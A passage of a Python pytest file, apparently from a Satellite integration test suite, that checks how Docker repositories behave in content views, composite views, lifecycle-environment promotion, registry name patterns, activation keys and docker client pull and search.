    :id: b79cbc97-3dba-4059-907d-19316684d569

    :expectedresults: One repository is created with a Docker upstream
        repository and the product is added to a random number of content
        views which are then added to a composite content view.

    :BZ: 1359665
    """
    # Build several published CVs, each holding one fresh docker repo.
    cv_versions = []
    for _ in range(randint(2, 5)):
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        repo = _repo(module_product.id)
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        assert len(content_view['versions']) == 1
        cv_versions.append(content_view['versions'][0])
    # All published versions become components of one composite CV.
    comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
    ContentView.update(
        {
            'component-ids': [cv_version['id'] for cv_version in cv_versions],
            'id': comp_content_view['id'],
        }
    )
    comp_content_view = ContentView.info({'id': comp_content_view['id']})
    comp_ids = [component['id'] for component in comp_content_view['components']]
    for cv_version in cv_versions:
        assert cv_version['id'] in comp_ids
@pytest.mark.tier2
def test_positive_publish_with_docker_repo(self, content_view):
    """Add Docker-type repository to content view and publish it once.

    :id: 28480de3-ffb5-4b8e-8174-fffffeef6af4

    :expectedresults: One repository is created with a Docker upstream
        repository and the product is added to a content view which is then
        published only once.
    """
    cv_id = content_view['id']
    # Fresh CV starts with no versions; publishing creates exactly one.
    assert len(content_view['versions']) == 0
    ContentView.publish({'id': cv_id})
    refreshed = ContentView.info({'id': cv_id})
    assert len(refreshed['versions']) == 1
@pytest.mark.tier2
def test_positive_publish_with_docker_repo_composite(self, content_view, module_org):
    """Add Docker-type repository to composite CV and publish it once.

    :id: 2d75419b-73ed-4f29-ae0d-9af8d9624c87

    :expectedresults: One repository is created with a Docker upstream
        repository and the product is added to a content view which is then
        published once and added to a composite content view which is also
        published once.

    :BZ: 1359665
    """
    assert len(content_view['versions']) == 0
    ContentView.publish({'id': content_view['id']})
    content_view = ContentView.info({'id': content_view['id']})
    assert len(content_view['versions']) == 1
    # Wrap the published version in a composite CV and publish that too.
    comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
    ContentView.update(
        {
            'component-ids': content_view['versions'][0]['id'],
            'id': comp_content_view['id'],
        }
    )
    comp_content_view = ContentView.info({'id': comp_content_view['id']})
    assert content_view['versions'][0]['id'] in [
        component['id'] for component in comp_content_view['components']
    ]
    ContentView.publish({'id': comp_content_view['id']})
    comp_content_view = ContentView.info({'id': comp_content_view['id']})
    assert len(comp_content_view['versions']) == 1
@pytest.mark.tier2
def test_positive_publish_multiple_with_docker_repo(self, content_view):
    """Add Docker-type repository to content view and publish it multiple
    times.

    :id: 33c1b2ee-ae8a-4a7e-8254-123d97aaaa58

    :expectedresults: One repository is created with a Docker upstream
        repository and the product is added to a content view which is then
        published multiple times.
    """
    assert len(content_view['versions']) == 0
    # Each publish must create a new version; counts must match exactly.
    publish_amount = randint(2, 5)
    for _ in range(publish_amount):
        ContentView.publish({'id': content_view['id']})
    content_view = ContentView.info({'id': content_view['id']})
    assert len(content_view['versions']) == publish_amount
    @pytest.mark.tier2
    def test_positive_publish_multiple_with_docker_repo_composite(self, module_org, content_view):
        """Add Docker-type repository to content view and publish it multiple
        times.

        :id: 014adf90-d399-4a99-badb-76ee03a2c350

        :expectedresults: One repository is created with a Docker upstream
            repository and the product is added to a content view which is then
            added to a composite content view which is then published multiple
            times.

        :BZ: 1359665
        """
        assert len(content_view['versions']) == 0
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        assert len(content_view['versions']) == 1
        # Wrap the published version in a composite CV.
        comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
        ContentView.update(
            {
                'component-ids': content_view['versions'][0]['id'],
                'id': comp_content_view['id'],
            }
        )
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        assert content_view['versions'][0]['id'] in [
            component['id'] for component in comp_content_view['components']
        ]
        # Repeatedly publish the composite; version count must track publish count.
        publish_amount = randint(2, 5)
        for _ in range(publish_amount):
            ContentView.publish({'id': comp_content_view['id']})
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        assert len(comp_content_view['versions']) == publish_amount
    @pytest.mark.tier2
    def test_positive_promote_with_docker_repo(self, module_org, module_lce, content_view):
        """Add Docker-type repository to content view and publish it.
        Then promote it to the next available lifecycle-environment.

        :id: a7df98f4-0ec0-40f6-8941-3dbb776d47b9

        :expectedresults: Docker-type repository is promoted to content view
            found in the specific lifecycle-environment.
        """
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        assert len(content_view['versions']) == 1
        cvv = ContentView.version_info({'id': content_view['versions'][0]['id']})
        # A freshly published version lives only in the Library environment.
        assert len(cvv['lifecycle-environments']) == 1
        ContentView.version_promote({'id': cvv['id'], 'to-lifecycle-environment-id': module_lce.id})
        cvv = ContentView.version_info({'id': content_view['versions'][0]['id']})
        # Promotion adds the target environment: Library + module_lce.
        assert len(cvv['lifecycle-environments']) == 2
    @pytest.mark.tier2
    @pytest.mark.upgrade
    def test_positive_promote_multiple_with_docker_repo(self, module_org, content_view):
        """Add Docker-type repository to content view and publish it.
        Then promote it to multiple available lifecycle-environments.

        :id: e9432bc4-a709-44d7-8e1d-00ca466aa32d

        :expectedresults: Docker-type repository is promoted to content view
            found in the specific lifecycle-environments.
        """
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        assert len(content_view['versions']) == 1
        cvv = ContentView.version_info({'id': content_view['versions'][0]['id']})
        assert len(cvv['lifecycle-environments']) == 1
        # Create 2-5 extra lifecycle environments to promote through.
        lces = [
            make_lifecycle_environment({'organization-id': module_org.id})
            for _ in range(1, randint(3, 6))
        ]
        # start=2 because Library already counts as one environment.
        for expected_lces, lce in enumerate(lces, start=2):
            ContentView.version_promote({'id': cvv['id'], 'to-lifecycle-environment-id': lce['id']})
            cvv = ContentView.version_info({'id': cvv['id']})
            assert len(cvv['lifecycle-environments']) == expected_lces
    @pytest.mark.tier2
    def test_positive_promote_with_docker_repo_composite(
        self, module_org, module_lce, content_view
    ):
        """Add Docker-type repository to composite content view and publish it.
        Then promote it to the next available lifecycle-environment.

        :id: fb7d132e-d7fa-4890-a0ec-746dd093513e

        :expectedresults: Docker-type repository is promoted to content view
            found in the specific lifecycle-environment.

        :BZ: 1359665
        """
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        assert len(content_view['versions']) == 1
        # Wrap the published version in a composite CV and publish it.
        comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
        ContentView.update(
            {
                'component-ids': content_view['versions'][0]['id'],
                'id': comp_content_view['id'],
            }
        )
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        assert content_view['versions'][0]['id'] in [
            component['id'] for component in comp_content_view['components']
        ]
        ContentView.publish({'id': comp_content_view['id']})
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
        # Fresh composite version exists only in Library until promoted.
        assert len(cvv['lifecycle-environments']) == 1
        ContentView.version_promote(
            {
                'id': comp_content_view['versions'][0]['id'],
                'to-lifecycle-environment-id': module_lce.id,
            }
        )
        cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
        assert len(cvv['lifecycle-environments']) == 2
    @pytest.mark.tier2
    @pytest.mark.upgrade
    def test_positive_promote_multiple_with_docker_repo_composite(self, content_view, module_org):
        """Add Docker-type repository to composite content view and publish it.
        Then promote it to the multiple available lifecycle-environments.

        :id: 345288d6-581b-4c07-8062-e58cb6343f1b

        :expectedresults: Docker-type repository is promoted to content view
            found in the specific lifecycle-environments.

        :BZ: 1359665
        """
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        assert len(content_view['versions']) == 1
        # Wrap the published version in a composite CV and publish it.
        comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
        ContentView.update(
            {
                'component-ids': content_view['versions'][0]['id'],
                'id': comp_content_view['id'],
            }
        )
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        assert content_view['versions'][0]['id'] in [
            component['id'] for component in comp_content_view['components']
        ]
        ContentView.publish({'id': comp_content_view['id']})
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
        assert len(cvv['lifecycle-environments']) == 1
        # Promote the composite version through 2-5 new environments;
        # start=2 because Library already counts as one environment.
        lces = [
            make_lifecycle_environment({'organization-id': module_org.id})
            for _ in range(1, randint(3, 6))
        ]
        for expected_lces, lce in enumerate(lces, start=2):
            ContentView.version_promote(
                {
                    'id': cvv['id'],
                    'to-lifecycle-environment-id': lce['id'],
                }
            )
            cvv = ContentView.version_info({'id': cvv['id']})
            assert len(cvv['lifecycle-environments']) == expected_lces
    @pytest.mark.tier2
    @pytest.mark.upgrade
    def test_positive_name_pattern_change(self, module_org):
        """Promote content view with Docker repository to lifecycle environment.
        Change registry name pattern for that environment. Verify that repository
        name on product changed according to new pattern.

        :id: 63c99ae7-238b-40ed-8cc1-d847eb4e6d65

        :expectedresults: Container repository name is changed
            according to new pattern.
        """
        lce = make_lifecycle_environment({'organization-id': module_org.id})
        pattern_prefix = gen_string('alpha', 5)
        docker_upstream_name = 'hello-world'
        # ERB-style pattern evaluated server-side when naming container repos.
        new_pattern = (
            f'{pattern_prefix}-<%= content_view.label %>/<%= repository.docker_upstream_name %>'
        )
        repo = _repo(
            make_product_wait({'organization-id': module_org.id})['id'],
            name=gen_string('alpha', 5),
            upstream_name=docker_upstream_name,
        )
        Repository.synchronize({'id': repo['id']})
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        ContentView.version_promote(
            {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
        )
        # Change the registry name pattern AFTER promotion and verify it stuck.
        LifecycleEnvironment.update(
            {
                'registry-name-pattern': new_pattern,
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        lce = LifecycleEnvironment.info({'id': lce['id'], 'organization-id': module_org.id})
        assert lce['registry-name-pattern'] == new_pattern
        repo = Repository.list(
            {'name': repo['name'], 'environment-id': lce['id'], 'organization-id': module_org.id}
        )[0]
        # Container repository names are lower-cased by the registry.
        expected_name = f'{pattern_prefix}-{content_view["label"]}/{docker_upstream_name}'.lower()
        assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
    @pytest.mark.tier2
    def test_positive_product_name_change_after_promotion(self, module_org):
        """Promote content view with Docker repository to lifecycle environment.
        Change product name. Verify that repository name on product changed
        according to new pattern.

        :id: 92279755-717c-415c-88b6-4cc1202072e2

        :expectedresults: Container repository name is changed
            according to new pattern.
        """
        old_prod_name = gen_string('alpha', 5)
        new_prod_name = gen_string('alpha', 5)
        docker_upstream_name = 'hello-world'
        new_pattern = '<%= content_view.label %>/<%= product.name %>'
        lce = make_lifecycle_environment({'organization-id': module_org.id})
        prod = make_product_wait({'organization-id': module_org.id, 'name': old_prod_name})
        repo = _repo(prod['id'], name=gen_string('alpha', 5), upstream_name=docker_upstream_name)
        Repository.synchronize({'id': repo['id']})
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        LifecycleEnvironment.update(
            {
                'registry-name-pattern': new_pattern,
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        lce = LifecycleEnvironment.info({'id': lce['id'], 'organization-id': module_org.id})
        assert lce['registry-name-pattern'] == new_pattern
        ContentView.version_promote(
            {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
        )
        Product.update({'name': new_prod_name, 'id': prod['id']})
        # Renaming the product alone must NOT rename the container repo:
        # the name is captured from the version promoted into the LCE.
        repo = Repository.list(
            {'name': repo['name'], 'environment-id': lce['id'], 'organization-id': module_org.id}
        )[0]
        expected_name = f'{content_view["label"]}/{old_prod_name}'.lower()
        assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
        # Only after a fresh publish + promote does the new product name apply.
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        ContentView.version_promote(
            {
                'id': content_view['versions'][-1]['id'],
                'to-lifecycle-environment-id': lce['id'],
            }
        )
        repo = Repository.list(
            {
                'name': repo['name'],
                'environment-id': lce['id'],
                'organization-id': module_org.id,
            }
        )[0]
        expected_name = f'{content_view["label"]}/{new_prod_name}'.lower()
        assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
    @pytest.mark.tier2
    def test_positive_repo_name_change_after_promotion(self, module_org):
        """Promote content view with Docker repository to lifecycle environment.
        Change repository name. Verify that Docker repository name on product
        changed according to new pattern.

        :id: f094baab-e823-47e0-939d-bd0d88eb1538

        :expectedresults: Container repository name is changed
            according to new pattern.
        """
        old_repo_name = gen_string('alpha', 5)
        new_repo_name = gen_string('alpha', 5)
        docker_upstream_name = 'hello-world'
        new_pattern = '<%= content_view.label %>/<%= repository.name %>'
        lce = make_lifecycle_environment({'organization-id': module_org.id})
        prod = make_product_wait({'organization-id': module_org.id})
        repo = _repo(prod['id'], name=old_repo_name, upstream_name=docker_upstream_name)
        Repository.synchronize({'id': repo['id']})
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        LifecycleEnvironment.update(
            {
                'registry-name-pattern': new_pattern,
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        ContentView.version_promote(
            {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
        )
        Repository.update({'name': new_repo_name, 'id': repo['id'], 'product-id': prod['id']})
        # Renaming the repository alone must NOT rename the container repo:
        # the name is captured from the version promoted into the LCE.
        repo = Repository.list(
            {
                'name': new_repo_name,
                'environment-id': lce['id'],
                'organization-id': module_org.id,
            }
        )[0]
        expected_name = f'{content_view["label"]}/{old_repo_name}'.lower()
        assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
        # Only after a fresh publish + promote does the new repo name apply.
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        ContentView.version_promote(
            {
                'id': content_view['versions'][-1]['id'],
                'to-lifecycle-environment-id': lce['id'],
            }
        )
        repo = Repository.list(
            {
                'name': new_repo_name,
                'environment-id': lce['id'],
                'organization-id': module_org.id,
            }
        )[0]
        expected_name = f'{content_view["label"]}/{new_repo_name}'.lower()
        assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
    @pytest.mark.tier2
    def test_negative_set_non_unique_name_pattern_and_promote(self, module_org):
        """Set registry name pattern to one that does not guarantee uniqueness.
        Try to promote content view with multiple Docker repositories to
        lifecycle environment. Verify that content has not been promoted.

        :id: eaf5e7ac-93c9-46c6-b538-4d6bd73ab9fc

        :expectedresults: Content view is not promoted
        """
        docker_upstream_names = ['hello-world', 'alpine']
        # Pattern has no repository-specific token, so two repos would
        # collide on the same container repository name.
        new_pattern = '<%= organization.label %>'
        lce = make_lifecycle_environment(
            {'organization-id': module_org.id, 'registry-name-pattern': new_pattern}
        )
        prod = make_product_wait({'organization-id': module_org.id})
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        for docker_name in docker_upstream_names:
            repo = _repo(prod['id'], upstream_name=docker_name)
            Repository.synchronize({'id': repo['id']})
            ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        # Promotion into the ambiguous-pattern LCE must be rejected.
        with pytest.raises(CLIReturnCodeError):
            ContentView.version_promote(
                {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
            )
    @pytest.mark.tier2
    def test_negative_promote_and_set_non_unique_name_pattern(self, module_org, module_product):
        """Promote content view with multiple Docker repositories to
        lifecycle environment. Set registry name pattern to one that
        does not guarantee uniqueness. Verify that pattern has not been
        changed.

        :id: 9f952224-084f-48d1-b2ea-85f3621becea

        :expectedresults: Registry name pattern is not changed
        """
        docker_upstream_names = ['hello-world', 'alpine']
        # Pattern has no repository-specific token -> would collide for
        # the two repos already promoted into the LCE.
        new_pattern = '<%= organization.label %>'
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        for docker_name in docker_upstream_names:
            repo = _repo(module_product.id, upstream_name=docker_name)
            Repository.synchronize({'id': repo['id']})
            ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        lce = make_lifecycle_environment({'organization-id': module_org.id})
        ContentView.version_promote(
            {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
        )
        # Applying the ambiguous pattern to a populated LCE must be rejected.
        with pytest.raises(CLIReturnCodeError):
            LifecycleEnvironment.update(
                {
                    'registry-name-pattern': new_pattern,
                    'id': lce['id'],
                    'organization-id': module_org.id,
                }
            )
class TestDockerActivationKey:
    """Tests specific to adding ``Docker`` repositories to Activation Keys.

    :CaseComponent: ActivationKeys

    :Assignee: chiggins

    :CaseLevel: Integration
    """

    @pytest.mark.tier2
    def test_positive_add_docker_repo_cv(self, module_org, module_lce, content_view_promote):
        """Add Docker-type repository to a non-composite content view
        and publish it. Then create an activation key and associate it with the
        Docker content view.

        :id: bb128642-d39f-45c2-aa69-a4776ea536a2

        :expectedresults: Docker-based content view can be added to activation
            key
        """
        # The content_view_promote fixture supplies an already promoted CV.
        activation_key = make_activation_key(
            {
                'content-view-id': content_view_promote['content-view-id'],
                'lifecycle-environment-id': module_lce.id,
                'organization-id': module_org.id,
            }
        )
        assert activation_key['content-view'] == content_view_promote['content-view-name']

    @pytest.mark.tier2
    def test_positive_remove_docker_repo_cv(self, module_org, module_lce, content_view_promote):
        """Add Docker-type repository to a non-composite content view
        and publish it. Create an activation key and associate it with the
        Docker content view. Then remove this content view from the activation
        key.

        :id: d696e5fe-1818-46ce-9499-924c96e1ef88

        :expectedresults: Docker-based content view can be added and then
            removed from the activation key.
        """
        activation_key = make_activation_key(
            {
                'content-view-id': content_view_promote['content-view-id'],
                'lifecycle-environment-id': module_lce.id,
                'organization-id': module_org.id,
            }
        )
        assert activation_key['content-view'] == content_view_promote['content-view-name']
        # Create another content view replace with
        another_cv = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.publish({'id': another_cv['id']})
        another_cv = ContentView.info({'id': another_cv['id']})
        ContentView.version_promote(
            {'id': another_cv['versions'][0]['id'], 'to-lifecycle-environment-id': module_lce.id}
        )
        # Point the activation key at the replacement CV; the Docker CV is
        # thereby detached from the key.
        ActivationKey.update(
            {
                'id': activation_key['id'],
                'organization-id': module_org.id,
                'content-view-id': another_cv['id'],
                'lifecycle-environment-id': module_lce.id,
            }
        )
        activation_key = ActivationKey.info({'id': activation_key['id']})
        assert activation_key['content-view'] != content_view_promote['content-view-name']

    @pytest.mark.tier2
    def test_positive_add_docker_repo_ccv(self, module_org, module_lce, content_view_publish):
        """Add Docker-type repository to a non-composite content view
        and publish it. Then add this content view to a composite content view
        and publish it. Create an activation key and associate it with the
        composite Docker content view.

        :id: 1d9b82fd-8dab-4fd9-ad35-656d712d56a2

        :expectedresults: Docker-based content view can be added to activation
            key

        :BZ: 1359665
        """
        # Build and publish a composite CV around the published version.
        comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
        ContentView.update(
            {
                'component-ids': content_view_publish['id'],
                'id': comp_content_view['id'],
            }
        )
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        assert content_view_publish['id'] in [
            component['id'] for component in comp_content_view['components']
        ]
        ContentView.publish({'id': comp_content_view['id']})
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        comp_cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
        ContentView.version_promote(
            {'id': comp_cvv['id'], 'to-lifecycle-environment-id': module_lce.id}
        )
        activation_key = make_activation_key(
            {
                'content-view-id': comp_content_view['id'],
                'lifecycle-environment-id': module_lce.id,
                'organization-id': module_org.id,
            }
        )
        assert activation_key['content-view'] == comp_content_view['name']

    @pytest.mark.tier2
    def test_positive_remove_docker_repo_ccv(self, module_org, module_lce, content_view_publish):
        """Add Docker-type repository to a non-composite content view
        and publish it. Then add this content view to a composite content view
        and publish it. Create an activation key and associate it with the
        composite Docker content view. Then, remove the composite content view
        from the activation key.

        :id: b4e63537-d3a8-4afa-8e18-57052b93fb4c

        :expectedresults: Docker-based composite content view can be added and
            then removed from the activation key.

        :BZ: 1359665
        """
        comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
        ContentView.update(
            {
                'component-ids': content_view_publish['id'],
                'id': comp_content_view['id'],
            }
        )
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        assert content_view_publish['id'] in [
            component['id'] for component in comp_content_view['components']
        ]
        ContentView.publish({'id': comp_content_view['id']})
        comp_content_view = ContentView.info({'id': comp_content_view['id']})
        comp_cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
        ContentView.version_promote(
            {'id': comp_cvv['id'], 'to-lifecycle-environment-id': module_lce.id}
        )
        activation_key = make_activation_key(
            {
                'content-view-id': comp_content_view['id'],
                'lifecycle-environment-id': module_lce.id,
                'organization-id': module_org.id,
            }
        )
        assert activation_key['content-view'] == comp_content_view['name']
        # Create another content view replace with
        another_cv = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.publish({'id': another_cv['id']})
        another_cv = ContentView.info({'id': another_cv['id']})
        ContentView.version_promote(
            {'id': another_cv['versions'][0]['id'], 'to-lifecycle-environment-id': module_lce.id}
        )
        # Swap the key to the replacement CV, detaching the composite.
        ActivationKey.update(
            {
                'id': activation_key['id'],
                'organization-id': module_org.id,
                'content-view-id': another_cv['id'],
                'lifecycle-environment-id': module_lce.id,
            }
        )
        activation_key = ActivationKey.info({'id': activation_key['id']})
        assert activation_key['content-view'] != comp_content_view['name']
class TestDockerClient:
    """Tests specific to using ``Docker`` as a client to pull Docker images
    from a Satellite 6 instance.

    :CaseComponent: ContentManagement

    :Assignee: ltran

    :CaseLevel: System

    :CaseImportance: Medium
    """

    @pytest.mark.tier3
    def test_positive_pull_image(self, module_org, docker_host):
        """A Docker-enabled client can use ``docker pull`` to pull a
        Docker image off a Satellite 6 instance.

        :id: 023f0538-2aad-4f87-b8a8-6ccced648366

        :Steps:

            1. Publish and promote content view with Docker content
            2. Register Docker-enabled client against Satellite 6.

        :expectedresults: Client can pull Docker images from server and run it.
        """
        product = make_product_wait({'organization-id': module_org.id})
        repo = _repo(product['id'])
        Repository.synchronize({'id': repo['id']})
        repo = Repository.info({'id': repo['id']})
        try:
            result = docker_host.execute(
                f'docker login -u {settings.server.admin_username}'
                f' -p {settings.server.admin_password} {settings.server.hostname}'
            )
            assert result.status == 0
            # publishing takes few seconds sometimes
            result, _ = wait_for(
                lambda: docker_host.execute(f'docker pull {repo["published-at"]}'),
                num_sec=60,
                delay=2,
                fail_condition=lambda out: out.status != 0,
                logger=logger,
            )
            assert result.status == 0
            try:
                result = docker_host.execute(f'docker run {repo["published-at"]}')
                assert result.status == 0
            finally:
                # Stop and remove the container
                result = docker_host.execute(f'docker ps -a | grep {repo["published-at"]}')
                container_id = result.stdout[0].split()[0]
                docker_host.execute(f'docker stop {container_id}')
                docker_host.execute(f'docker rm {container_id}')
        finally:
            # Remove docker image
            docker_host.execute(f'docker rmi {repo["published-at"]}')

    @pytest.mark.skip_if_not_set('docker')
    @pytest.mark.tier3
    def test_positive_container_admin_end_to_end_search(self, module_org, docker_host):
        """Verify that docker command line can be used against
        Satellite server to search for container images stored
        on Satellite instance.

        :id: cefa74e1-e40d-4f47-853b-1268643cea2f

        :steps:

            1. Publish and promote content view with Docker content
            2. Set 'Unauthenticated Pull' option to false
            3. Try to search for docker images on Satellite
            4. Use Docker client to login to Satellite docker hub
            5. Search for docker images
            6. Use Docker client to log out of Satellite docker hub
            7. Try to search for docker images (ensure last search result
               is caused by change of Satellite option and not login/logout)
            8. Set 'Unauthenticated Pull' option to true
            9. Search for docker images

        :expectedresults: Client can search for docker images stored
            on Satellite instance
        """
        pattern_prefix = gen_string('alpha', 5)
        registry_name_pattern = (
            f'{pattern_prefix}-<%= content_view.label %>/<%= repository.docker_upstream_name %>'
        )
        # Satellite setup: create product and add Docker repository;
        # create content view and add Docker repository;
        # create lifecycle environment and promote content view to it
        lce = make_lifecycle_environment({'organization-id': module_org.id})
        product = make_product_wait({'organization-id': module_org.id})
        repo = _repo(product['id'], upstream_name=CONTAINER_UPSTREAM_NAME)
        Repository.synchronize({'id': repo['id']})
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        ContentView.version_promote(
            {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
        )
        LifecycleEnvironment.update(
            {
                'registry-name-pattern': registry_name_pattern,
                'registry-unauthenticated-pull': 'false',
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        # Expected repository URI as it should appear in search output.
        docker_repo_uri = (
            f' {settings.server.hostname}/{pattern_prefix}-{content_view["label"]}/'
            f'{CONTAINER_UPSTREAM_NAME} '
        ).lower()
        # 3. Try to search for docker images on Satellite
        remote_search_command = (
            f'docker search {settings.server.hostname}/{CONTAINER_UPSTREAM_NAME}'
        )
        result = docker_host.execute(remote_search_command)
        assert result.status == 0
        # Anonymous search must not reveal the repo while unauthenticated
        # pull is disabled.
        assert docker_repo_uri not in result.stdout
        # 4. Use Docker client to login to Satellite docker hub
        result = docker_host.execute(
            f'docker login -u {settings.server.admin_username}'
            f' -p {settings.server.admin_password} {settings.server.hostname}'
        )
        assert result.status == 0
        # 5. Search for docker images
        result = docker_host.execute(remote_search_command)
        assert result.status == 0
        assert docker_repo_uri in result.stdout
        # 6. Use Docker client to log out of Satellite docker hub
        result = docker_host.execute(f'docker logout {settings.server.hostname}')
        assert result.status == 0
        # 7. Try to search for docker images
        result = docker_host.execute(remote_search_command)
        assert result.status == 0
        assert docker_repo_uri not in result.stdout
        # 8. Set 'Unauthenticated Pull' option to true
        LifecycleEnvironment.update(
            {
                'registry-unauthenticated-pull': 'true',
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        # 9. Search for docker images
        result = docker_host.execute(remote_search_command)
        assert result.status == 0
        assert docker_repo_uri in result.stdout

    @pytest.mark.skip_if_not_set('docker')
    @pytest.mark.tier3
    def test_positive_container_admin_end_to_end_pull(self, module_org, docker_host):
        """Verify that docker command line can be used against
        Satellite server to pull in container images stored
        on Satellite instance.

        :id: 2a331f88-406b-4a5c-ae70-302a9994077f

        :steps:

            1. Publish and promote content view with Docker content
            2. Set 'Unauthenticated Pull' option to false
            3. Try to pull in docker image from Satellite
            4. Use Docker client to login to Satellite container registry
            5. Pull in docker image
            6. Use Docker client to log out of Satellite container registry
            7. Try to pull in docker image (ensure next pull result
               is caused by change of Satellite option and not login/logout)
            8. Set 'Unauthenticated Pull' option to true
            9. Pull in docker image

        :expectedresults: Client can pull in docker images stored
            on Satellite instance
        """
        pattern_prefix = gen_string('alpha', 5)
        docker_upstream_name = CONTAINER_UPSTREAM_NAME
        registry_name_pattern = (
            f'{pattern_prefix}-<%= content_view.label %>/<%= repository.docker_upstream_name %>'
        )
        # Satellite setup: create product and add Docker repository;
        # create content view and add Docker repository;
        # create lifecycle environment and promote content view to it
        lce = make_lifecycle_environment({'organization-id': module_org.id})
        product = make_product_wait({'organization-id': module_org.id})
        repo = _repo(product['id'], upstream_name=docker_upstream_name)
        Repository.synchronize({'id': repo['id']})
        content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
        ContentView.publish({'id': content_view['id']})
        content_view = ContentView.info({'id': content_view['id']})
        ContentView.version_promote(
            {'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
        )
        LifecycleEnvironment.update(
            {
                'registry-name-pattern': registry_name_pattern,
                'registry-unauthenticated-pull': 'false',
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        docker_repo_uri = (
            f'{settings.server.hostname}/{pattern_prefix}-{content_view["label"]}/'
            f'{docker_upstream_name}'
        ).lower()
        # 3. Try to pull in docker image from Satellite
        docker_pull_command = f'docker pull {docker_repo_uri}'
        result = docker_host.execute(docker_pull_command)
        # Anonymous pull must fail while unauthenticated pull is disabled.
        assert result.status == 1
        # 4. Use Docker client to login to Satellite docker hub
        result = docker_host.execute(
            f'docker login -u {settings.server.admin_username}'
            f' -p {settings.server.admin_password} {settings.server.hostname}'
        )
        assert result.status == 0
        # 5. Pull in docker image
        # publishing takes few seconds sometimes
        result, _ = wait_for(
            lambda: docker_host.execute(docker_pull_command),
            num_sec=60,
            delay=2,
            fail_condition=lambda out: out.status != 0,
            logger=logger,
        )
        assert result.status == 0
        # 6. Use Docker client to log out of Satellite docker hub
        result = docker_host.execute(f'docker logout {settings.server.hostname}')
        assert result.status == 0
        # 7. Try to pull in docker image
        result = docker_host.execute(docker_pull_command)
        assert result.status == 1
        # 8. Set 'Unauthenticated Pull' option to true
        LifecycleEnvironment.update(
            {
                'registry-unauthenticated-pull': 'true',
                'id': lce['id'],
                'organization-id': module_org.id,
            }
        )
        # 9. Pull in docker image
